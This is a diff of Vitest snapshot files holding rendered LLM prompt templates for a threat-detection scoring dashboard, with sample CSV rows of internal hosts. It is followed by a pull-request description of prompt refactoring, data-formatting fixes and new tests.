+             Entity: the name of the asset that is the subject of the threat detection set
+             Entity Type: the asset type. it may be an endpoint, a host, a cloud user, a Github user, or a kubernetes pod. 
+             Ip: the IP address of the asset if it is an endpoint; other entity types will generally not have an IP address.
+             Atomic Weight: this is the risk score number of the set. It contains a number ranging from 1 to 118 and an element name matching the number on the periodic table. It is computed by a formula that considers the number and types of relationships in the set to compute signal confidence and importance. It is a unique metric and does not use severities or simple risk scores. 
+             Atomic Mass: this is the number of alerts and detection artifacts in the set. There is not a direct correlation between atomic mass and atomic weight; high atomic mass does not indicate signal confidence or severity. When atomic weight is high, atomic mass tends to be more significant, as a low atomic weight with a high atomic mass could be a false positive storm. 
+
+      [User Instructions/Task]
+
+      First, repeat the data from the details provided and state what each field is so that we know you have parsed it correctly. Repeat the question so we can see you received it. 
+
+Using the following data: "Entity,Entity Type,Ip,Atomic Weight,Atomic Mass
+workstation-42,Host,10.4.2.17,181.7,272
+db-prod-03,Host,10.4.9.201,204.3,311
+svc-backup,Account,10.4.2.90,96.2,140" to answer the following question: "Why is this entity scoring so high?""
+`;
+
+exports[`rendered snapshots > ThreatStatusSummaryPrompt 1`] = `
+"[System Role/Instruction]
+
+      You are an expert threat hunter and detection analyst using an advanced threat detection platform. You are reading summary threat detection scoring information.
+
+      [Background Knowledge]
+
+      Handle all text case insensitively. The data contains the following elements: First, there is a CSV data structure with column names. This is the data you need to answer the question about. Here are the CSV field definitions: 
+
+             Entity: the name of the asset that is the subject of the threat detection set
+             Entity Type: the asset type. it may be an endpoint, a host, a cloud user, a Github user, or a kubernetes pod. 
+             Ip: the IP address of the asset if it is an endpoint; other entity types will generally not have an IP address.
+             Atomic Weight: this is the risk score number of the set. It contains a number ranging from 1 to 118 and an element name matching the number on the periodic table. It is computed by a formula that considers the number and types of relationships in the set to compute signal confidence and importance. It is a unique metric and does not use severities or simple risk scores. 
+             Atomic Mass: this is the number of alerts and detection artifacts in the set. There is not a direct correlation between atomic mass and atomic weight; high atomic mass does not indicate signal confidence or severity. When atomic weight is high, atomic mass tends to be more significant, as a low atomic weight with a high atomic mass could be a false positive storm. 
+
+      [User Instructions/Task]
+
+      First, repeat the data from the details provided and state what each field is so that we know you have parsed it correctly. 
+
+       "Entity,Entity Type,Ip,Atomic Weight,Atomic Mass
+workstation-42,Host,10.4.2.17,181.7,272
+db-prod-03,Host,10.4.9.201,204.3,311
+svc-backup,Account,10.4.2.90,96.2,140" 
+
+       Give a summary explanation of this data using the fields provided. Indicate which rows are the most important."
+`;


### PR DESCRIPTION
Prompt text now lives in files rather than string literals, with a small {{placeholder}} renderer on each side.

- protostar-react/src/prompts/*.txt: the seven page prompts, imported with Vite ?raw. PromptService keeps its method signatures, so no call sites changed.
- protostar-ai-dev-flask-api/prompts/*.txt: the two case-agent prompts. promptservice reads them per call, so prompt edits take effect without restarting Flask.

Payloads were being sent in shapes the model could not read:
- Home/Summary interpolated a raw array, flattening it to one undelimited comma run with no field names. Added FormatEntityTable for labelled CSV. The concat meant to merge the header row discarded its result.
- Details sent Object.values(), stripping the column names. Added FormatColumnTable to transpose column-major data into labelled rows.
- Case prompts sent column-major JSON. Added get_entity_alerts_csv; ~37% smaller and no reconstruction by row index.

Fixes:
- Entity names were truncated at the first hyphen in four Cypher queries, so hf-worker-01 appeared as worker-01. Now matches the browser rule, which requires "- ".
- The Atomic Mass column read node.count (41) instead of the alert count (15), contradicting its own glossary definition.
- AlertPrompt interpolated an object without JSON.stringify.
- agent_case_comment_prompt used JS ${} syntax in a Python f-string, and now receives case_details as well as telemetry.

Added:
- vitest + 61 tests over the prompts: placeholder substitution, data presence, quote balance, dangling instructions, and rendered snapshots.
- Prompt logging to logs/prompts.log behind [Logging] LogPrompts, off by default, with a /promptlog route and a Settings tab, newest entry first.
- Summary and Details output boxes render markdown in a growing div instead of a height-guessed textarea with its own scrollbar.
- Summary colours atomic weight 50-99 yellow alongside the existing red.